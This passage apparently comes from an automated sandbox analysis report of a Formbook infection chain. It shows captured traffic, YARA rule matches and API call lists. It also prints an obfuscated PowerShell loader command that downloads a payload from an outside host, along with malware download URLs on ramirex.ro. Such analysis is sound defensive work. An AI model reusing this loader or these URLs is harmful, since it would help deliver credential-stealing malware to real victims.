1c 9b 82 9e 50 82 b4 45 5b b3 2f d0 09 0f 86 e9 ca 40 07 d6 00 55 ca 83 47 f7 80 6e 34 98 5f 07 ae 9b 23 a1 81 dc d9 f6 e1 f9 89 e5 98 f2 12 7f f0 48 ac 85 91 cf 4f 60 4e 04 34 4c fa fc 44 7c e2 e2 43 3c f8 d6 41 81 91 b7 fd 9d 18 d6 a6 77 4a 48 1b a9 d7 fa 85 da 82 b7 5a 15 8a f8 91 53 65 0e c0 18 fd fc 2f ff 82 50 50 4f ac a4 fd 89 f9 e3 6a 75 b3 be bd 5d 0e be e1 16 6e fb 8a 40 70 c5 3c 5c 5b d4 12 0b 0e 37 48 00 df 01 ae 6d 87 8e 7d d9 ee fb 77 dd f9 51 e9 fa 97 cd ea 0c c6 a7 b2 98 ce b6 b3 c9 6c 36 7d 2b df 6f df e2 58 9e be c3 f7 62 36 1d 9f 4e c4 94 ed 7f 11 9b 67 87 16 64 61 ea 97 83 c1 fc 4d 9a 0e 00 20 85 af a6 b4 8e 5a 23 08 f5 7e 08 9f 55 e1 ac b7 25 41 c5 7e 09 29 59 5f 40 a1 91 ad 07 83 5d 04 25 25 0a 6a 1d 0f 2f 59 d8 f0 30 bb 90 f3 fa b1 d1 d6 71 8b 60 53 72 cb 10 c2 40 83 2d 23 46 b0 2b ce 59 77 e2 a1 46 ef c5 0e 81 9b 9a 90 65 f7 6a a1 75 32 04 df 60 a1 4a 55 f0 69 1f 41 
9a 23 99 8a b1 7f 4d 4e d9 08 42 3f fc 5d 90 67 88 b3 31 3e 62 14 79 b0 dd 41 ed a8 35 82 3b db 42 c1 44 21 32 50 86 cc ca 61 84 6c 5b 02 45 9c 59 c3 4c b4 e7 09 51 c5 3d 7f 2c 94 bc 55 e0 3b 45 45 c5 68 ad 51 46 44 c2 39 3b 8a 15 1d 35 7c 32 82 3c 10 d7 28 0c e7 69 4b de ed 96 f7 f8 a0 d2 8b fa 8a ed fe 05 07 c2 21 4f a2 f1 ec 5e df 6e 89 a5 68 35 8d a2 d6 66 73 0b 42 77 62 ef 8f 85 fe 8a ef 99 03 89 b6 66 17 41 68 6c bb ab 42 09 b5 b8 c7 3f 78 56 89 a6 d9 87 84 31 02 3a eb ee 05 6f 06 d7 cb 7d 39 18 e1 55 dd 68 3c e3 e5 91 7d 47 fb 0e c6 f8 63 13 d9 9b 8a 47 64 ab 76 5c 6d dd ef af 56 ac d8 ef 2c cb 37 ad af d8 dc 08 b2 61 8c c2 68 94 ea 01 a1 62 b1 50 31 2f 29 50 87 9a af fa 16 43 ad 8c aa db fa 50 ff d5 8b 8f 7d df b8 4d f8 28 0a d2 bc 16 c1 ed bd 6d 4f b8 74 c7 7f b6 ea 58 bd 53 bb 8a 78 31 bb 48 91 2e 07 ff 01 0c 51 4e 35 f9 05 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 36buTMo8WLu[mE8PE1?v~I&973Y]wk?_OsH,6=Uxe/$Qse]]dzyr$,pZ")]
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 01 Jun 2024 17:59:43 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 33 36 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 75 54 4d 6f db 38 10 bd fb 57 4c 75 c9 c5 b2 9c 26 86 9b d4 36 d0 c6 5e c4 40 da 04 89 8a 22 47 9a 1a 59 44 28 52 4b 8e a2 18 d8 3f 94 f3 fe 84 fc b1 1d 8a 76 36 fd 3a c9 24 e7 bd 37 f3 66 c6 b3 77 cb eb 8b fc fe 66 05 97 f9 97 2b b8 f9 f6 f9 6a 7d 01 49 9a 65 df 4f 2e b2 6c 99 2f e3 c3 e9 68 7c 9c 65 ab af 09 24 15 51 73 9e 65 5d d7 8d ba 93 91 75 db 2c bf cd 2a aa f5 69 e6 c9 29 49 a3 82 8a 64 31 98 85 3b d0 c2 6c e7 49 e9 fa 0b 14 05 df d7 48 02 02 4b 8a 7f b7 ea 71 9e 5c 58 43 68 28 cd 77 0d 26 20 e3 69 9e 10 3e 51 4f fc 11 64 25 9c 47 9a b7 54 a6 1f 02 55 cf 61 44 8d f3 c4 d9 8d 25 ff 06 67 ac c1 a1 b1 ca 14 f8 c4 df d2 6a 6d bb 57 d0 5b 61 29 64 85 69 10 74 56 ff c0 90 f6 4f bf 05 35 4e 6c 6b f1 87 e8 7c 9d 5f ad 16 a7 e3 53 f8 6a 09 fe b2 ad 29 66 59 bc 1c cc b2 cb d5 a7 25 27 ff f9 7a 79 cf 9f cb e3 c5 9b 20 3e 0d f2 0a c1 b1 29 e8 09 0b 28 ac 6c 6b f6 05 3a e1 c1 30 5d 19 e8 c0 1a a0 4a 79 f0 e8 1e d1 8d 06 b3 9b c0 75 7b 20 34 90 3b db 3e be 3c b3 1c 53 5e e1 ff 3c 05 d6 c2 14 2f cf 60 8e 04 34 4c fa f2 4c 7c e2 e2 43 3c f8 d6 81 c4 c8 db fe 4a 0c 2b d3 3b 25 0a 1b a9 57 fa 95 da 82 b7 5a 49 45 fc c8 a9 32 07 60 8c 7e f9 97 7f 41 28 a8 27 56 85 fd 81 f9 d3 72 79 bb ba bb 5b 0c be e3 06 ee fa 8a 40 70 c5 3c 5c 1b d4 05 4a 0e 37 48 00 ff 00 dc d8 0e 1d fb b2 d9 f5 ef ba f3 a3 d2 f5 2f eb e5 39 94 72 3a 3e 91 d3 0f 63 89 c7 9b e9 f4 6c 33 9d 4c 26 63 2c 70 22 df 9f e1 c9 19 db ff 2a 36 cb f6 2d c8 c2 d4 2f 06 83 d9 bb 34 1d 00 40 0a df 4c 69 1d b5 46 10 ea dd 10 be 28 e9 ac b7 25 41 c5 7e 89 a2 60 7d 01 52 23 5b 0f 06 bb 08 4a 4a 14 d4 3a 1e 5e b2 b0 e6 61 76 21 e7 d5 53 a3 ad e3 16 c1 ba e4 96 21 84 81 06 5b 46 8c 60 57 9c b3 ee c8 43 8d de 8b 2d 02 37 35 21 cb ee d5 42 eb 64 08 be 41 a9 4a 25 f9 b4 8b 20 
cd 91 4c c5 d8 c9 f1 7b 36 82 d0 0f 7f 15 e4 19 e2 6c 8c 8f 18 45 1e 6c b7 57 3b 68 8d e0 de b6 20 99 28 44 06 ca 90 59 39 8c 90 4d 4b a0 88 33 6b 98 89 76 3c 21 4a 3e f0 c7 42 c9 5b 05 be 53 24 2b 46 6b 8d 45 44 24 9c b3 a3 58 d1 41 c3 27 23 c8 03 71 8d c2 70 9e b6 e4 dd 6e 79 8f f7 2a bd a8 af d8 ee 9f 70 20 1c f2 24 1a cf ee f5 ed 2e b0 14 ad a6 51 d4 5a af ef 40 e8 4e ec fc a1 d0 9f f1 3d 73 20 d1 d6 6c 23 08 8d 6d b7 55 28 a1 16 0f f8 1b cf 2a d1 34 bb 90 30 46 40 67 dd 83 e0 cd e0 7a b9 2f 7b 23 bc aa 1b 8d e7 bc 3c 45 df d1 be 83 31 fe d0 44 f6 a6 e2 11 d9 a8 2d 57 5b f7 fb ab 15 2b f6 3b cb f2 4d eb 2b 36 37 82 6c 18 a3 30 1a a5 7a 44 a8 58 2c 54 cc 4b 0a d4 a1 e6 ab be c5 50 2b a3 ea b6 de d7 7f fd ea 63 df 37 6e 13 3e 09 49 9a d7 22 b8 bd b3 ed 11 97 ee f8 cf 56 1d aa 77 6a 5b 11 2f 66 17 29 d2 c5 e0 3f 09 0f 7c a5 f9 05 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 36auTMo8WLu&6^@"GYD(RK?v6:$7fwf+j}IeO.l/h|e$Qse]u,*i)Id1;lI
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 01 Jun 2024 17:59:46 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeAccept-Ranges: bytesData Raw: 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 66 72 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 6e 65 2c 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 70 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 0a 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 64 6f 63 75 6d 65 6e 74 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 50 3e 0a 3c 48 52 3e 0a 3c 48 31 3e 4e 6f 6e 20 54 72 6f 75 76 c3 a9 3c 2f 48 31 3e 0a 4c 65 20 64 6f 63 75 6d 65 6e 74 20 64 65 6d 61 6e 64 c3 a9 20 6e 27 61 20 70 61 73 20 c3 a9 74 c3 a9 20 74 72 6f 75 76 c3 a9 20 73 75 72 20 63 65 20 73 65 72 76 65 75 72 2e 0a 3c 50 3e 0a 3c 48 52 3e 0a 3c 48 31 3e 4e 6f 20 45 6e 63 6f 6e 74 72 61 64 6f 3c 2f 48 31 3e 0a 45 6c 20 64 6f 63 75 6d 65 6e 74 6f 20 73 6f 6c 69 63 69 74 
61 64 6f 20 6e 6f 20 73 65 20 65 6e 63 6f 6e 74 72 c3 b3 20 65 6e 20 65 73 74 65 20 73 65 72 76 69 64 6f 72 2e 0a 3c 50 3e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 0a 57 65 62 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 62 65 6c 64 65 63 6f 72 2e 6e 65 74 20 20 7c 20 20 50 6f 77 65 72 65 64 20 62 79 20 77 77 77 2e 6c 77 73 2e 66 72 20 20 7c 20 20 49 44 3a 20 61 32 61 66 61 37 63 66 30 34 62 66 30 33 61 61 66 62 31 62 37 36 33 33 30 30 37 36 34 32 38 39 0a 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 0a 3c 21 2d 2d 0a 20 20 20 2d 20 55 6e 66 6f 72 74 75 6e 61 74 65 6c 79 2c 20 4d 69 63 72 6f 73 6f 66 74 20 68 61 73 20 61 64 64 65 64 20 61 20 63 6c 65 76 65 72 20 6e 65 77 0a 20 20 20 2d 20 22 66 65 61 74 75 72 65 22 20 74 6f 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 2e 20 49 66 20 74 68 65 20 74 65 78 74 20 6f 66 0a 20 20 20 2d 20 61 6e 20 65 72 72 6f 72 27 73 20 6d 65 73 73 61 67 65 20 69 73 20 22 74 6f 6f 20 73 6d 61 6c 6c 22 2c 20 73 70 65 63 69 66 69 63 61 6c 6c 79 0a 20 20
          Source: powershell.exe, 00000002.00000002.1892792593.00000206255D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1653655863.000000000582E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: powershell.exe, 0000000E.00000002.1650625908.0000000004918000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1656812613.0000000007215000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: powershell.exe, 00000002.00000002.1781282776.0000020617316000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ramirex.ro
          Source: powershell.exe, 00000002.00000002.1781282776.0000020615568000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1650625908.00000000047C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: powershell.exe, 0000000E.00000002.1650625908.0000000004918000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1656812613.0000000007215000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: powershell.exe, 00000002.00000002.1781282776.0000020615568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
          Source: powershell.exe, 0000000E.00000002.1650625908.00000000047C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
          Source: powershell.exe, 0000000E.00000002.1653655863.000000000582E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 0000000E.00000002.1653655863.000000000582E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 0000000E.00000002.1653655863.000000000582E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
          Source: powershell.exe, 0000000E.00000002.1650625908.0000000004918000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1656812613.0000000007215000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 00000002.00000002.1781282776.00000206167A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
          Source: powershell.exe, 00000002.00000002.1892792593.00000206255D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1653655863.000000000582E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
          Source: powershell.exe, 00000002.00000002.1781282776.0000020615787000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1781282776.0000020616E42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ramirex.ro
          Source: wab.exe, 00000012.00000002.1866014372.0000000006A18000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000002.1866014372.0000000006A55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ramirex.ro/
          Source: wab.exe, 00000012.00000002.1866014372.0000000006A18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ramirex.ro/)6
          Source: wab.exe, 00000012.00000002.1866014372.0000000006A18000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000002.1865972215.0000000006970000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 00000012.00000002.1866014372.0000000006A55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ramirex.ro/HtwvlcDSFcrAhhcHdD97.bin
          Source: wab.exe, 00000012.00000002.1865972215.0000000006970000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ramirex.ro/HtwvlcDSFcrAhhcHdD97.binBestobs194.59.30.6/HtwvlcDSFcrAhhcHdD97.bin
          Source: wab.exe, 00000012.00000002.1866014372.0000000006A55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ramirex.ro/HtwvlcDSFcrAhhcHdD97.bina
          Source: powershell.exe, 00000002.00000002.1781282776.0000020615787000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ramirex.ro/Rutschebanes.qxdP
          Source: powershell.exe, 0000000E.00000002.1650625908.0000000004918000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ramirex.ro/Rutschebanes.qxdXR
          Source: wab.exe, 00000012.00000002.1866014372.0000000006A55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ramirex.ro/u
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
          Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
          Source: unknownHTTPS traffic detected: 188.215.50.15:443 -> 192.168.2.7:49700 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.215.50.15:443 -> 192.168.2.7:49707 version: TLS 1.2

          E-Banking Fraud

          Source: Yara matchFile source: 00000016.00000002.2532785700.0000000002750000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000002.2533029666.0000000002790000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000002.2529006519.00000000021A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.1842902275.00000000028F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000019.00000002.2534596239.00000000013E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.1880343761.0000000022820000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.2534939674.0000000002800000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

          System Summary

          Source: amsi32_7668.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
          Source: 00000016.00000002.2532785700.0000000002750000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000016.00000002.2533029666.0000000002790000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000016.00000002.2529006519.00000000021A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000012.00000002.1842902275.00000000028F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000019.00000002.2534596239.00000000013E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000012.00000002.1880343761.0000000022820000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000015.00000002.2534939674.0000000002800000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: powershell.exe PID: 6600, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
          Source: Process Memory Space: powershell.exe PID: 7668, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
          Source: C:\Windows\System32\wscript.exe | Process created: Commandline size = 6654
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: Commandline size = 6654
          Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Radiosender='Sub';$Radiosender+='strin';$Knnest = 1;$Radiosender+='g';Function Beshout($Solurenes){$Strejftogters=$Solurenes.Length-$Knnest;For($Overskringers=5;$Overskringers -lt $Strejftogters;$Overskringers+=6){$Neodadaism+=$Solurenes.$Radiosender.Invoke( $Overskringers, $Knnest);}$Neodadaism;}function Lovbundnes($Yttria){ . ($Afskalningernes) ($Yttria);}$Piggy=Beshout 'MrtelM Kr.dotcknozOversi .alil.angslI traa Woma/Hjemm5Ustem.Battl0Byudv Fr,g( ndeWHaandiSkrannTankrdForgroAdvokwAtropsPiske Pne mNpandoT.tuts bane1 dap0 Copy.Sei.m0 Nyre;Procu ,ropWPr,exifleyenmonta6Dou l4 Dri,;S bco TorvexUafvr6Kooke4Rep.e;Ensur AfrakrtingsvEcaud:.rtho1Tele,2Micro1,punk.Dvelr0compl)Duboi UnameG .dskeFreskcdesidkForumoS.fte/Rd,pr2Kbenh0Indre1Topvi0Vaag.0Charl1Batho0Rever1Aureg encodF Bel iDvrgtrBastieK,ydsfIndlgohemicxsigna/ac,ep1 odvi2.jalt1vandf.Hulen0,ates ';$Formaliaers=Beshout 'fugtpUSkiljs.ippeeSlivorKnobk-GldesANonirgCoxiee Lag nIdenttPo.ku ';$Gem=Beshout 'Opadgh ValgtDivertcountpFortssRigm.:Be,po/vr.ss/NeoterMetheaPyramm Borti ZikkrManyreFunktx,awmi.Foredr Treso Afpu/antirRTradeu.omatt.seudsIndevcGimpmhast,re No.fbLkk,raFyrstndokhmeRecresR leg.ZabraqJustuxMidvedMinco ';$Morsomhedernes78=Beshout ' Pli.>Bemr, ';$Afskalningernes=Beshout 'Cou,tiBombaeFor,lx,obbe ';$Uniformerne='Requisites';$Generaliserede135 = Beshout 'Mn treSildecDynamhFremfo Herr Shri%Udrk a F,nspSyc.ppPasswdBadesaKok etBro,eaNedry%Stand\Skan,MBal.ie Preft istaaKrngecBidraaKlororSeashpBe hiaUlulalIleossPloto.FordoTFoto oSea akRepre Rumfr&.ltfo&Proce ViolieSeer,cInterh tdfaoT,lst Pomatt Flle ';Lovbundnes (Beshout 'Manip$NetstgDuromlCountoDeathbSalgsaStor.lSuper:AlloyBB nbrlSpe.la Linif Oketf Pro,eHals,rSydvee Kla.nAtlas=Rangl(BrokkcMal,kmAcftsdErrat Polit/GiantcDesm. 
usdy$B kagGPer.eeUro.tn fleteczardrPretea VaerlBuff,i KorpsFinureBre.srLderveSloucdR.gnbeBando1Ordna3 I,el5Fre,s) Bowl ');Lovbundnes (Beshout 'Kilde$ VaaggHumoul trusoCom,ebPagurakritelBynrt:TorsoMSkibsa derasGuimpsCentiaSenagcSuctirForhaeemmagd Cade= Amor$CardiG AvlseAcidbmChr.s.DronnsSmaltpLevnel ChariChinctBurme( Goni$BowldM.angeoS,mmer issisSterooS,vermProfihFanemeBeggadDrakme Xemer.erienextraeKonomsS.per7 amle8Verde)Kaf,e ');$Gem=$Massacred[0];$Benzyls= (Beshout ' Four$Brn gg D ggl RokaoCoarcbH.ndgaSamlel.ilgo: ReflG DispeAmar n AvereIoretr opt,iHoos c Mi daAfkrflUnderlPorceyHyper= .estNSortle RatgwSlhun-SinliO RacebDaabsjHalsseStandc lokbt .yra TilbaS Dolpyu.sprsKvag tTri,ee ResimBashe.EllarNChemie.yskutTriam.prevoW,nisoeko orbDisedCChevel routi.rende orinnBalitt');$Benzyls+=$Blafferen[1];Lovbundnes ($Benzyls);Lovbundnes (Beshout '.esen$AkuleGStratePneumn paceebe olrJut.si carmcBe.tya JnanlEmbr lTerraySjamb.FyrsvH ,evie nfela U lndH.ctoeAnteprKon asLevne[Tilst$ ,nseFBellioUnderr Ravem,reagaKo,iflOverdiTerkeaFreshe Unr r Cra.sAmour]Forch=Tvely$Ko edPCountiForstgAbonng TordyTroll ');$Cla
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 18_2_22542C70 NtFreeVirtualMemory,LdrInitializeThunk
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 18_2_225435C0 NtCreateMutant,LdrInitializeThunk
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 18_2_22542DF0 NtQuerySystemInformation,LdrInitializeThunk
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 18_2_22544650 NtSuspendThread
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 18_2_22544340 NtSetContextThread
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 18_2_22543D70 NtOpenThread
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 18_2_22542C60 NtCreateKey
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 18_2_22542B60 NtClose
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 18_2_22542F60 NtCreateProcessEx
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 18_2_22542D10 NtMapViewOfSection
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 18_2_22543010 NtOpenDirectoryObject
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 18_2_22543D10 NtOpenProcessToken
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 18_2_22542C00 NtQueryInformationProcess
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 18_2_22542D00 NtSetInformationFile
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 18_2_22542D30 NtUnmapViewOfSection
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 18_2_22542E30 NtWriteVirtualMemory
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 18_2_22542F30 NtCreateSection
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 18_2_22542AD0 NtReadFile
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 18_2_22542DD0 NtDelayExecution
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 18_2_22542CC0 NtQueryVirtualMemory
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 18_2_22542BF0 NtAllocateVirtualMemory
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 18_2_22542AF0 NtWriteFile
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 18_2_22542CF0 NtOpenProcess
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 18_2_22542BE0 NtQueryValueKey
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 18_2_22542EE0 NtQueueApcThread
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 18_2_22542FE0 NtCreateFile
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 18_2_22542F90 NtProtectVirtualMemory
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 18_2_22543090 NtSetValueKey
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 18_2_22542B80 NtQueryInformationFile
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 18_2_22542E80 NtReadVirtualMemory
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 18_2_22542AB0 NtWaitForSingleObject
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 18_2_22542DB0 NtEnumerateKey
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 18_2_22542FB0 NtResumeThread
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 18_2_225439B0 NtGetContextThread
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 18_2_22542BA0 NtEnumerateValueKey
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 18_2_22542CA0 NtQueryInformationToken
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 18_2_22542EA0 NtAdjustPrivilegesToken
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 18_2_22542FA0 NtQuerySection
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 18_2_03C32542 Sleep,LdrInitializeThunk,LdrInitializeThunk,NtProtectVirtualMemory
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_043535C0 NtCreateMutant,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_04354650 NtSuspendThread,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_04353090 NtSetValueKey,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_04354340 NtSetContextThread,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_04352C70 NtFreeVirtualMemory,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_04352C60 NtCreateKey,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_04352CA0 NtQueryInformationToken,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_04352D30 NtUnmapViewOfSection,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_04352D10 NtMapViewOfSection,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_04352DF0 NtQuerySystemInformation,LdrInitializeThunk
